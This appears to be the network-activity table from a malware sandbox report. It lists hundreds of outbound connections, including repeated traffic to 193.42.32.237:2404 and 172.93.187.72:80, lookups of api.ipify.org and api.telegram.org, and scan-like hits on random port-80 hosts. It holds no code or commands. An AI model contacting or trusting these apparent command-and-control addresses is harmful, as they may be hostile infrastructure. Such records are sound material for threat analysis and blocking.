| LV | 83.241.74.57:8080 | tcp | |
| IN | 101.214.129.20:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 96.231.87.227:80 | tcp | |
| NO | 84.48.13.17:80 | tcp | |
| US | 99.26.62.206:80 | tcp | |
| JP | 219.110.177.116:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| CA | 205.207.93.150:80 | tcp | |
| SG | 124.197.74.144:80 | tcp | |
| US | 6.64.68.186:80 | tcp | |
| CN | 222.175.234.244:80 | tcp | |
| US | 9.85.72.42:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| GB | 81.141.203.85:8080 | tcp | |
| US | 165.190.103.148:80 | tcp | |
| GR | 147.102.64.105:80 | tcp | |
| US | 172.67.140.104:80 | africatechs.com | tcp |
| US | 172.67.140.104:443 | africatechs.com | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| JP | 220.22.73.196:80 | tcp | |
| US | 26.155.235.56:80 | tcp | |
| US | 40.122.26.59:80 | tcp | |
| US | 166.80.99.46:80 | tcp | |
| US | 137.69.28.190:80 | tcp | |
| US | 8.8.8.8:53 | 59.26.122.40.in-addr.arpa | udp |
| US | 69.2.22.47:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| FI | 195.197.41.177:80 | tcp | |
| US | 8.8.8.8:53 | www.dsc-marketing.com | udp |
| US | 74.220.199.6:80 | www.dsc-marketing.com | tcp |
| US | 8.8.8.8:53 | 6.199.220.74.in-addr.arpa | udp |
| US | 161.102.207.156:80 | tcp | |
| US | 6.20.221.94:80 | tcp | |
| US | 22.69.168.33:80 | tcp | |
| US | 48.151.252.50:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 21.35.1.121:80 | tcp | |
| NL | 84.104.146.58:80 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| MX | 148.214.118.77:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| BE | 146.103.118.239:80 | tcp | |
| EG | 105.86.195.230:80 | tcp | |
| US | 24.208.125.216:80 | tcp | |
| JP | 60.92.252.32:80 | tcp | |
| US | 136.204.77.44:8080 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 208.193.219.217:80 | tcp | |
| US | 40.223.3.159:80 | tcp | |
| CN | 117.11.229.83:80 | tcp | |
| CN | 36.167.28.228:80 | tcp | |
| JP | 174.127.80.46:80 | tcp | |
| US | 9.29.142.185:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 29.248.149.238:443 | tcp | |
| SE | 143.118.52.167:80 | tcp | |
| US | 76.192.213.205:80 | tcp | |
| US | 188.114.96.0:80 | phonevronlene.xyz | tcp |
| US | 35.57.16.51:80 | tcp | |
| GB | 195.210.117.240:80 | tcp | |
| IT | 95.214.88.129:80 | tcp | |
| PT | 94.133.167.190:443 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | www.rrlearningcenter.com | udp |
| US | 34.149.87.45:80 | www.rrlearningcenter.com | tcp |
| DE | 149.172.11.223:80 | tcp | |
| US | 139.35.217.176:80 | tcp | |
| CN | 122.76.135.121:80 | tcp | |
| US | 8.8.8.8:53 | 45.87.149.34.in-addr.arpa | udp |
| JP | 133.1.141.214:80 | tcp | |
| US | 69.184.102.215:80 | tcp | |
| US | 21.239.18.82:80 | tcp | |
| CA | 199.22.70.23:443 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 174.145.210.57:443 | tcp | |
| BR | 201.55.71.110:80 | tcp | |
| VN | 113.189.223.217:80 | tcp | |
| IE | 86.41.247.142:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 13.108.151.182:80 | tcp | |
| US | 100.215.18.198:8080 | tcp | |
| US | 18.233.12.91:80 | tcp | |
| KZ | 2.75.235.188:80 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 169.109.97.129:80 | tcp | |
| US | 172.65.251.78:443 | gitlab.com | tcp |
| US | 32.221.14.216:80 | tcp | |
| US | 75.174.132.51:80 | tcp | |
| ES | 37.152.89.81:80 | tcp | |
| CL | 190.160.19.215:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 65.143.186.38:80 | tcp | |
| US | 17.178.168.199:80 | tcp | |
| GB | 51.56.86.66:8080 | tcp | |
| IT | 151.92.201.95:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 17.5.189.19:80 | tcp | |
| GB | 150.204.187.193:80 | tcp | |
| US | 147.223.168.56:80 | tcp | |
| CN | 101.228.104.183:80 | tcp | |
| US | 54.42.225.78:80 | tcp | |
| US | 143.228.4.222:80 | tcp | |
| US | 8.8.8.8:53 | www.ywx5pn.com | udp |
| BG | 193.42.32.237:2404 | tcp | |
| CN | 106.35.164.9:80 | tcp | |
| CH | 62.48.5.248:80 | tcp | |
| US | 30.77.146.96:80 | tcp | |
| US | 159.94.157.113:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 173.105.211.150:80 | tcp | |
| US | 158.107.97.150:80 | tcp | |
| US | 173.203.138.79:8080 | tcp | |
| BR | 187.35.80.177:80 | tcp | |
| US | 140.71.28.69:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 32.9.229.221:80 | tcp | |
| US | 97.31.214.6:80 | tcp | |
| FR | 157.169.214.250:80 | tcp | |
| US | 100.197.132.54:80 | tcp | |
| DE | 2.247.255.25:80 | tcp | |
| N/A | 10.20.134.192:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| CN | 182.174.20.206:80 | tcp | |
| GR | 5.55.103.114:80 | tcp | |
| US | 163.205.238.124:80 | tcp | |
| EG | 154.186.75.128:80 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| US | 17.70.40.31:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 74.88.133.107:80 | tcp | |
| DE | 162.19.130.230:80 | tcp | |
| CN | 118.88.250.126:80 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| US | 96.135.238.165:80 | tcp | |
| BR | 179.182.168.242:80 | tcp | |
| US | 206.196.185.208:443 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| CN | 36.155.41.130:80 | tcp | |
| CN | 114.251.197.168:80 | tcp | |
| GB | 92.9.151.69:443 | tcp | |
| CN | 183.253.139.150:80 | tcp | |
| US | 8.8.8.8:53 | www.sky71.link | udp |
| JP | 124.38.55.50:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 137.99.218.17:443 | tcp | |
| RU | 77.66.168.31:80 | tcp | |
| US | 67.246.21.189:443 | tcp | |
| US | 45.42.189.216:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 135.185.4.1:80 | tcp | |
| US | 65.231.57.160:80 | tcp | |
| KR | 223.39.175.31:80 | tcp | |
| IR | 5.73.93.28:80 | tcp | |
| CH | 57.89.115.210:8080 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 28.241.185.68:80 | tcp | |
| JP | 157.109.251.178:80 | tcp | |
| AU | 139.207.95.106:80 | tcp | |
| US | 166.134.137.81:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 76.59.9.159:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| DE | 3.73.182.21:80 | tcp | |
| CN | 203.190.96.153:80 | tcp | |
| US | 192.132.204.220:80 | tcp | |
| US | 155.127.51.37:80 | tcp | |
| US | 170.37.186.83:80 | tcp | |
| US | 29.73.43.91:80 | tcp | |
| FR | 195.138.220.222:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| CR | 201.197.53.210:80 | tcp | |
| US | 40.11.193.169:80 | tcp | |
| KR | 221.166.96.124:8080 | tcp | |
| US | 216.99.71.155:443 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 173.149.96.227:80 | tcp | |
| MX | 187.250.52.73:80 | tcp | |
| US | 8.8.8.8:53 | www.landscapestandard.com | udp |
| DE | 53.147.183.2:80 | tcp | |
| US | 33.218.119.46:443 | tcp | |
| US | 3.130.253.23:80 | www.landscapestandard.com | tcp |
| US | 172.93.187.72:80 | tcp | |
| NL | 88.221.24.122:443 | www.bing.com | tcp |
| NL | 88.221.24.122:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 23.253.130.3.in-addr.arpa | udp |
| NL | 88.221.24.122:443 | www.bing.com | udp |
| US | 139.46.31.236:80 | tcp | |
| US | 8.8.8.8:53 | 122.24.221.88.in-addr.arpa | udp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 68.178.195.176:80 | tcp | |
| CN | 112.81.141.134:80 | tcp | |
| US | 216.153.151.63:80 | tcp | |
| US | 8.8.8.8:53 | 176.195.178.68.in-addr.arpa | udp |
| US | 107.182.69.202:80 | tcp | |
| SG | 43.103.194.10:80 | tcp | |
| US | 69.153.83.106:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 67.99.64.137:80 | tcp | |
| DE | 164.59.55.18:80 | tcp | |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| NL | 88.221.24.122:443 | r.bing.com | tcp |
| NL | 88.221.24.18:443 | r.bing.com | tcp |
| NL | 88.221.24.18:443 | r.bing.com | tcp |
| NL | 88.221.24.122:443 | r.bing.com | tcp |
| US | 151.155.82.211:80 | tcp | |
| US | 8.8.8.8:53 | 18.24.221.88.in-addr.arpa | udp |
| BG | 193.42.32.237:2404 | tcp | |
| NL | 88.221.24.18:443 | r.bing.com | udp |
| AR | 181.167.37.160:80 | tcp | |
| NL | 80.115.241.99:80 | tcp | |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| IE | 40.126.31.73:443 | login.microsoftonline.com | tcp |
| US | 172.93.187.72:80 | tcp | |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| DE | 46.142.122.144:80 | tcp | |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| CN | 222.89.81.200:8080 | tcp | |
| BE | 141.135.211.92:443 | tcp | |
| CN | 39.172.175.110:80 | tcp | |
| GB | 25.215.240.175:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| CN | 1.26.226.252:80 | tcp | |
| JP | 153.153.63.173:80 | tcp | |
| SG | 43.85.217.118:80 | tcp | |
| US | 215.26.102.229:80 | tcp | |
| US | 204.79.197.200:443 | www2.bing.com | tcp |
| DE | 149.217.171.198:8080 | tcp | |
| US | 144.171.215.138:80 | tcp | |
| US | 32.21.120.181:80 | tcp | |
| RU | 5.42.64.33:80 | 5.42.64.33 | tcp |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| US | 8.8.8.8:53 | www.arcade-games-88932.bond | udp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 159.102.208.131:443 | tcp | |
| ZA | 105.2.26.238:80 | tcp | |
| CL | 181.74.102.117:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| FI | 151.98.71.149:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| SG | 148.72.253.95:80 | tcp | |
| US | 34.107.238.165:80 | tcp | |
| BR | 177.171.251.160:80 | tcp | |
| US | 73.99.228.142:80 | tcp | |
| US | 8.8.8.8:53 | 165.238.107.34.in-addr.arpa | udp |
| US | 192.3.108.47:80 | 192.3.108.47 | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| ES | 87.125.45.186:80 | tcp | |
| CN | 120.218.88.225:80 | tcp | |
| CN | 49.5.82.82:8080 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| SG | 52.74.225.56:443 | tcp | |
| US | 146.142.46.27:80 | tcp | |
| KR | 116.45.139.81:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| JP | 52.195.190.27:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| PL | 213.222.194.147:80 | tcp | |
| US | 65.160.196.235:80 | tcp | |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| BG | 193.42.32.237:2404 | tcp | |
| CN | 222.139.176.34:80 | tcp | |
| US | 98.157.51.104:80 | tcp | |
| US | 205.1.225.9:80 | tcp | |
| JP | 219.165.157.239:80 | tcp | |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 173.231.16.76:443 | api.ipify.org | tcp |
| GH | 154.161.36.13:80 | tcp | |
| US | 215.241.108.34:80 | tcp | |
| FR | 163.66.205.180:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| CA | 198.235.29.203:80 | tcp | |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| TW | 210.244.144.251:80 | tcp | |
| GH | 154.174.186.4:80 | tcp | |
| AU | 180.94.113.210:80 | tcp | |
| US | 8.8.8.8:53 | www.willispeng.com | udp |
| US | 34.149.87.45:80 | www.willispeng.com | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 16.216.27.195:80 | tcp | |
| KZ | 178.90.196.152:8080 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| CN | 103.36.161.67:80 | tcp | |
| US | 8.8.8.8:53 | 1.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| CN | 123.127.67.65:80 | tcp | |
| US | 38.58.205.118:80 | tcp | |
| CH | 46.140.222.20:80 | tcp | |
| US | 29.67.228.58:80 | tcp | |
| CA | 161.184.246.209:80 | tcp | |
| US | 66.115.26.230:80 | tcp | |
| PL | 94.42.206.134:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 74.137.241.139:80 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| EE | 85.29.199.45:80 | tcp | |
| BE | 157.164.143.219:80 | tcp | |
| US | 73.35.72.198:80 | tcp | |
| US | 15.175.48.162:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| BR | 189.64.45.174:80 | tcp | |
| GB | 83.98.106.145:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 205.159.200.19:80 | tcp | |
| US | 208.159.153.66:80 | tcp | |
| US | 174.196.178.85:80 | tcp | |
| GB | 31.102.236.185:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 66.137.91.207:80 | tcp | |
| BR | 131.221.194.160:80 | tcp | |
| CN | 58.129.90.223:443 | tcp | |
| US | 128.32.243.154:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| AU | 139.218.182.14:80 | tcp | |
| US | 22.134.142.60:80 | tcp | |
| TW | 163.17.80.85:80 | tcp | |
| US | 99.185.56.28:80 | tcp | |
| US | 134.39.75.155:80 | tcp | |
| KR | 121.163.49.74:80 | tcp | |
| US | 8.8.8.8:53 | www.legalloanmaster.com | udp |
| US | 34.117.168.233:80 | www.legalloanmaster.com | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | 233.168.117.34.in-addr.arpa | udp |
| CN | 218.18.229.1:8080 | tcp | |
| US | 205.198.37.46:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| N/A | 140.235.54.77:80 | tcp | |
| KR | 61.75.156.220:80 | tcp | |
| US | 19.249.189.141:80 | tcp | |
| BR | 200.161.222.243:80 | tcp | |
| BR | 189.114.109.233:80 | tcp | |
| DE | 178.6.106.26:8080 | tcp | |
| US | 51.125.123.4:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 29.67.162.198:80 | tcp | |
| BE | 87.65.188.250:443 | tcp | |
| CN | 183.229.10.122:80 | tcp | |
| FR | 78.155.141.10:80 | tcp | |
| JP | 133.251.155.157:8080 | tcp | |
| CA | 207.216.71.118:80 | tcp | |
| MY | 42.155.212.229:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 98.147.56.171:80 | tcp | |
| ZA | 168.210.111.26:80 | tcp | |
| CN | 115.50.16.210:8080 | tcp | |
| US | 162.57.52.17:80 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| CN | 36.205.139.218:8080 | tcp | |
| US | 199.39.180.62:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 67.175.41.202:80 | tcp | |
| NL | 217.101.110.103:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| MU | 154.94.1.232:80 | tcp | |
| FI | 84.251.54.41:443 | tcp | |
| US | 73.111.191.42:443 | tcp | |
| JP | 106.153.85.138:80 | tcp | |
| US | 8.8.8.8:53 | www.outlemax.com | udp |
| IT | 81.17.18.195:80 | www.outlemax.com | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | 195.18.17.81.in-addr.arpa | udp |
| KR | 220.84.164.215:80 | tcp | |
| JP | 163.56.237.230:80 | tcp | |
| US | 48.70.103.60:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 34.13.228.110:80 | tcp | |
| US | 38.58.152.21:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 169.104.215.231:80 | tcp | |
| CO | 13.227.17.165:80 | tcp | |
| US | 12.197.28.12:80 | tcp | |
| FI | 84.240.85.63:80 | tcp | |
| US | 12.109.180.92:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 56.155.214.186:8080 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 100.8.148.25:80 | tcp | |
| US | 17.199.229.237:80 | tcp | |
| FI | 84.251.194.18:80 | tcp | |
| US | 184.37.20.158:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 12.205.242.175:80 | tcp | |
| US | 135.142.152.143:80 | tcp | |
| CN | 175.27.62.74:80 | tcp | |
| US | 48.59.154.161:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 38.15.48.24:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| JP | 113.159.41.7:8080 | tcp | |
| CN | 59.57.91.128:80 | tcp | |
| KE | 105.61.213.54:80 | tcp | |
| FI | 194.215.181.16:80 | tcp | |
| IN | 115.249.24.239:80 | tcp | |
| US | 207.239.23.219:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 54.5.233.235:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| HK | 182.239.75.45:8080 | tcp | |
| US | 8.8.8.8:53 | www.xyhbg.com | udp |
| US | 154.64.84.212:80 | www.xyhbg.com | tcp |
| US | 12.18.181.237:80 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| JP | 202.171.144.166:80 | tcp | |
| PT | 213.138.252.105:80 | tcp | |
| US | 8.8.8.8:53 | 212.84.64.154.in-addr.arpa | udp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 165.6.92.102:80 | tcp | |
| US | 153.74.127.3:80 | tcp | |
| US | 130.165.122.103:80 | tcp | |
| US | 209.111.117.20:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| FR | 79.94.10.168:80 | tcp | |
| US | 30.94.187.19:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| PL | 193.23.61.238:80 | tcp | |
| BR | 179.90.148.210:80 | tcp | |
| IN | 157.39.11.168:80 | tcp | |
| CN | 222.248.106.26:80 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| GB | 216.97.226.39:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 56.96.192.34:80 | tcp | |
| SG | 165.21.214.82:8080 | tcp | |
| UA | 88.154.176.70:80 | tcp | |
| BE | 35.195.22.194:80 | tcp | |
| US | 8.8.8.8:53 | 194.22.195.35.in-addr.arpa | udp |
| US | 161.226.46.223:80 | tcp | |
| NL | 77.173.23.209:8080 | tcp | |
| US | 206.211.23.217:80 | tcp | |
| MX | 187.176.155.180:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| ZA | 137.214.73.191:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 159.136.10.101:80 | tcp | |
| US | 172.65.251.78:443 | gitlab.com | tcp |
| NL | 88.221.24.18:443 | www.bing.com | udp |
| GB | 78.146.224.8:80 | tcp | |
| IN | 202.177.238.96:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 174.252.38.4:80 | tcp | |
| US | 162.42.78.89:80 | tcp | |
| GB | 86.175.8.53:80 | tcp | |
| US | 100.143.211.120:80 | tcp | |
| KR | 175.197.95.40:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| PH | 180.190.41.157:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| CN | 223.10.110.128:80 | tcp | |
| US | 24.18.124.121:80 | tcp | |
| US | 8.8.8.8:53 | www.webpanel.cfd | udp |
| DE | 46.91.36.82:80 | tcp | |
| US | 16.140.134.96:80 | tcp | |
| DE | 95.90.120.105:80 | tcp | |
| ES | 188.84.40.120:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| PL | 188.252.81.165:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 168.184.107.229:80 | tcp | |
| US | 72.14.201.36:80 | tcp | |
| CN | 115.238.41.99:80 | tcp | |
| US | 9.1.92.163:80 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| N/A | 100.120.157.111:80 | tcp | |
| CA | 99.237.192.170:80 | tcp | |
| US | 64.147.123.76:8080 | tcp | |
| US | 48.112.149.181:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 172.162.251.99:80 | tcp | |
| PS | 176.119.254.229:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| TH | 203.157.217.19:8080 | tcp | |
| US | 147.2.202.149:80 | tcp | |
| IT | 194.244.11.149:80 | tcp | |
| US | 169.173.236.250:80 | tcp | |
| US | 17.73.164.171:80 | tcp | |
| ID | 103.166.48.91:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| ZA | 197.71.44.160:80 | tcp | |
| JP | 49.212.223.75:80 | tcp | |
| US | 144.69.148.58:80 | tcp | |
| VN | 116.100.254.78:80 | tcp | |
| CH | 195.160.99.173:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 69.219.30.179:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 67.11.101.223:80 | tcp | |
| FR | 92.131.90.52:80 | tcp | |
| NO | 92.220.75.16:80 | tcp | |
| US | 8.8.8.8:53 | www.surpcop.online | udp |
| US | 162.254.38.168:80 | www.surpcop.online | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 4.75.175.104:80 | tcp | |
| US | 8.8.8.8:53 | 168.38.254.162.in-addr.arpa | udp |
| US | 167.154.97.28:80 | tcp | |
| US | 26.88.29.90:80 | tcp | |
| TH | 118.173.45.130:80 | tcp | |
| US | 54.227.201.121:80 | tcp | |
| US | 8.8.8.8:53 | app.nnnaajjjgc.com | udp |
| HK | 154.221.26.108:80 | app.nnnaajjjgc.com | tcp |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 138.93.51.64:80 | tcp | |
| ID | 39.208.240.98:80 | tcp | |
| US | 12.180.29.188:80 | tcp | |
| N/A | 10.242.83.253:80 | tcp | |
| JP | 160.11.104.107:80 | tcp | |
| RS | 79.175.82.209:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| JP | 220.58.64.225:80 | tcp | |
| US | 13.103.162.131:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| CH | 195.176.70.165:80 | tcp | |
| JP | 106.183.98.67:80 | tcp | |
| RU | 213.21.18.97:443 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| BD | 103.202.55.172:65012 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 73.27.166.47:80 | tcp | |
| BE | 149.5.23.127:80 | tcp | |
| US | 137.26.244.208:80 | tcp | |
| US | 47.155.247.203:80 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| DZ | 41.201.87.90:80 | tcp | |
| US | 204.136.205.248:443 | tcp | |
| DE | 162.33.137.103:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 8.8.8.8:53 | www.ios333cbp.top | udp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | www.alibaba.com | udp |
| US | 8.8.8.8:53 | 106.39.251.142.in-addr.arpa | udp |
| NL | 23.206.101.240:443 | www.alibaba.com | tcp |
| NL | 23.206.101.240:443 | www.alibaba.com | tcp |
| US | 172.93.187.72:80 | tcp | |
| US | 8.8.8.8:53 | 240.101.206.23.in-addr.arpa | udp |
| BG | 193.42.32.237:2404 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| RU | 5.42.64.33:80 | 5.42.64.33 | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| NL | 142.250.179.163:80 | www.gstatic.com | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 8.8.8.8:53 | www.buscafincas.net | udp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 8.8.8.8:53 | www.factrip.com | udp |
| BD | 103.202.55.172:65012 | tcp | |
| US | 54.161.222.85:80 | www.factrip.com | tcp |
| US | 8.8.8.8:53 | 85.222.161.54.in-addr.arpa | udp |
| US | 172.93.187.72:80 | tcp | |
| US | 54.161.222.85:80 | www.factrip.com | tcp |
| US | 54.161.222.85:80 | www.factrip.com | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| VN | 103.75.184.21:80 | www.nongsanvietco.com | tcp |
| US | 172.93.187.72:80 | tcp | |
| VN | 103.75.184.21:80 | www.nongsanvietco.com | tcp |
| VN | 103.75.184.21:80 | www.nongsanvietco.com | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| BD | 103.202.55.172:65012 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 74.220.199.6:80 | www.dsc-marketing.com | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| US | 172.93.187.72:80 | tcp | |
| US | 74.220.199.6:80 | www.dsc-marketing.com | tcp |
